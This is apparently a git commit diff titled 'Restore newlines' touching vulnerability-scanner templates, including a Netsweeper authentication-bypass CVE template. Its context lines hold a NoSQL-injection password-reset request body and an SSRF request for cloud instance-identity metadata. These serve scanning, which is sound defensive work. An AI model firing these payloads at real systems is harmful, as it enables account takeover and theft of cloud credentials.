Restore newlines
parent
81e77d7423
commit
14423e1220
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2014-9618
|
||||
|
||||
info:
|
||||
name: Netsweeper 4.0.8 - Authentication Bypass (New Profile Creation)
|
||||
name: Netsweeper 4.0.8 - Authentication Bypass (New Profile Creation)
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL.
|
||||
|
|
|
@ -23,7 +23,9 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Content-Type: application/json
|
||||
|
||||
{"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -29,6 +29,7 @@ requests:
|
|||
- |+
|
||||
GET http://{{hostval}}/dynamic/instance-identity/document HTTP/1.1
|
||||
Host: {{hostval}}
|
||||
|
||||
payloads:
|
||||
hostval:
|
||||
- alibaba.interact.sh
|
||||
|
|
|
@ -21,21 +21,27 @@ requests:
|
|||
- |+
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |+
|
||||
GET http://somethingthatdoesnotexist/ HTTP/1.1
|
||||
Host: somethingthatdoesnotexist
|
||||
|
||||
- |+
|
||||
GET http://127.0.0.1/ HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
|
||||
- |+
|
||||
GET https://127.0.0.1/ HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
|
||||
- |+
|
||||
GET http://localhost/ HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
- |+
|
||||
GET https://localhost/ HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
unsafe: true
|
||||
req-condition: true
|
||||
stop-at-first-match: true
|
||||
|
|
Loading…
Reference in New Issue